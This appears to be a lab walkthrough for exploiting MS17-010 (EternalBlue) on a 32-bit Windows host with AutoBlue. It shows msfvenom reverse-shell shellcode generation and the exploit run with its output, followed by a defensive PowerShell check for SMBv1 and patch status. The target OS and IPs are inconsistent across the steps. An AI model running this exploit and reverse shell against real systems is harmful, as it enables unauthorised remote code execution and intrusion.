# Exploitation

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

{% embed url="<https://www.youtube.com/watch?v=_uLJB_Ys120>" %}
Good Tutorial
{% endembed %}

This walkthrough is done without Metasploit, since the Metasploit module for MS17-010 only supports 64-bit systems and the target here is a 32-bit Windows 7 SP1 system.

Steps:

After cloning the GitHub repo, go to the `shellcode` directory and generate the shellcode.

```
╭─      /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode     master ?1 ▓▒░──░▒▓ ✔  root@kali 
╰─ ./shell_prep.sh          
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.49.227
LPORT you want x64 to listen on:
80
LPORT you want x86 to listen on:
80
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
```

Notice the different shellcode files that were generated:

```
ls
eternalblue_kshellcode_x64.asm  sc_all.bin         sc_x64_msf.bin     sc_x86_msf.bin
eternalblue_kshellcode_x86.asm  sc_x64.bin         sc_x86.bin         shell_prep.sh
eternalblue_sc_merge.py         sc_x64_kernel.bin  sc_x86_kernel.bin
```

The one we need is either `sc_x86.bin` or `sc_x86_msf.bin`, depending on whether we want to catch the shell with Metasploit's multi/handler or with plain netcat. In my case I ran the exploit with the `sc_x86.bin` shellcode because I only wanted to listen with netcat.

```
python3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
```

![](https://607280274-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FW4W90VbfwmNDIWm2WPEp%2Fuploads%2FWNzUBdhYKb21y8Kacu1Q%2F2022-07-20_12-20.png?alt=media\&token=32a6b7d9-c624-4ae5-a00b-cfa20bc26f7d)
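From the defender's side, the exploit above only works against a host that still exposes SMBv1 and lacks the MS17-010 update. The following PowerShell check is an added example, not code from the AutoBlue project or the original page: it reads the `LanmanServer` SMB1 registry value that Windows 7 / Server 2008 R2 use to control SMBv1 and queries installed hotfixes for the MS17-010 KB numbers (the KB list is assumed from the March 2017 bulletin for Windows 7 SP1 / Server 2008 R2 SP1; adjust it for other releases).

```powershell
# Added example (not from the AutoBlue project or the original page).
# Checks the two preconditions EternalBlue / MS17-010 depends on:
#   1. SMBv1 server enabled (LanmanServer\Parameters\SMB1 absent or 1 on Win7/2008 R2)
#   2. MS17-010 hotfix missing (KB list assumed from the March 2017 bulletin
#      for Windows 7 SP1 / Server 2008 R2 SP1; adjust for other releases)

$smbParams  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$ms17010Kbs = @('KB4012212', 'KB4012215', 'KB4012598')

function Get-Smb1State {
    # On Windows 7 / Server 2008 R2 a missing SMB1 value means SMBv1 is enabled.
    $value = Get-ItemProperty -Path $smbParams -Name SMB1 -ErrorAction SilentlyContinue
    if ($null -eq $value)  { return 'Enabled (default, value not set)' }
    if ($value.SMB1 -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Get-Ms17010Status {
    $installed = Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $ms17010Kbs -contains $_.HotFixID }
    if ($installed) { return "Patched ($($installed.HotFixID -join ', '))" }
    # Later monthly rollups supersede these KBs, so "not found" is not proof of
    # exposure; verify against the currently installed cumulative update.
    return 'MS17-010 KB not found (may be superseded by a later rollup)'
}

Write-Host "SMBv1 server : $(Get-Smb1State)"
Write-Host "MS17-010     : $(Get-Ms17010Status)"

# Mitigation (run as administrator, then reboot): disabling SMBv1 removes the
# attack surface even when patch state cannot be confirmed. Left commented out
# so that the script is read-only by default.
# Set-ItemProperty -Path $smbParams -Name SMB1 -Type DWORD -Value 0 -Force
```

On Windows 8.1 / Server 2012 R2 and later, `Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol` reports the same state directly.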
